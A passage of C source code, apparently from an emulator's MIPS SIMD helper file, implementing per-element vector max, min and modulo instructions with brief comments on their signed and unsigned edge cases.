static inline int64_t msa_max_a_df(uint32_t df, int64_t arg1, int64_t arg2)
{
    uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1;
    uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2;
    return abs_arg1 > abs_arg2 ?
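/*
 * MAX_A compares magnitudes but keeps the original signed value: for
 * MAX_A.B, (-7, 5) yields -7 because |-7| > |5|; when the magnitudes
 * are equal the wt operand (arg2) wins.
 */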
arg1 : arg2; } void helper_msa_max_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_max_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 > arg2 ? 
arg1 : arg2; } void helper_msa_max_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_max_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 > u_arg2 ? 
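/*
 * The comparison is unsigned, but the value returned is the original
 * sign-extended argument; only its low df bits survive the narrowing
 * store, so MAX_U.B applied to 0x80 and 0x7f compares 128 > 127 and
 * stores 0x80.
 */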
arg1 : arg2; } void helper_msa_max_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_a_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; return abs_arg1 < abs_arg2 ? 
arg1 : arg2; } void helper_msa_min_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_min_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 < arg2 ? 
arg1 : arg2; } void helper_msa_min_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_min_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 < u_arg2 ? 
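/*
 * The _u comparisons reinterpret the sign-extended arguments as unsigned
 * values of the element width: for MIN_U.B, arg1 = -1 is compared as
 * 0xff = 255, so min_u(-1, 1) returns 1.
 */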
arg1 : arg2; } void helper_msa_min_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_min_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Modulo * ---------- * * +---------------+----------------------------------------------------------+ * | MOD_S.B | Vector Signed Modulo (byte) | * | MOD_S.H | Vector Signed Modulo (halfword) | * | MOD_S.W | Vector Signed Modulo (word) | * | MOD_S.D | Vector Signed Modulo (doubleword) | * | MOD_U.B | Vector Unsigned Modulo (byte) | * | MOD_U.H | Vector Unsigned Modulo (halfword) | * | MOD_U.W | Vector Unsigned Modulo (word) | * | MOD_U.D | Vector Unsigned Modulo (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_mod_s_df(uint32_t df, int64_t arg1, int64_t arg2) { if (arg1 == DF_MIN_INT(df) && arg2 == -1) { return 0; } return arg2 ? 
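/*
 * The DF_MIN_INT(df)/-1 guard above does double duty: for DF_DOUBLE it
 * avoids host undefined behaviour (INT64_MIN % -1 overflows in C), and
 * for every format it pins the remainder of min_int / -1 to the
 * mathematically expected 0. A zero divisor returns arg1 unchanged.
 */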
arg1 % arg2 : arg1; } void helper_msa_mod_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_mod_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_mod_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_mod_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_mod_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_mod_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_mod_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_mod_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_mod_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_mod_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_mod_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_mod_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_mod_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_mod_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_mod_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_mod_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_mod_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_mod_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_mod_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_mod_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_mod_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_mod_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_mod_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_mod_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_mod_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_mod_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_mod_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_mod_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_mod_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_mod_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_mod_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_mod_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_mod_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_mod_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_mod_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg2 ? 
u_arg1 % u_arg2 : u_arg1; } void helper_msa_mod_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_mod_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_mod_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_mod_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_mod_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_mod_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_mod_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_mod_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_mod_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_mod_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_mod_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_mod_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_mod_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_mod_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_mod_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_mod_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_mod_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void 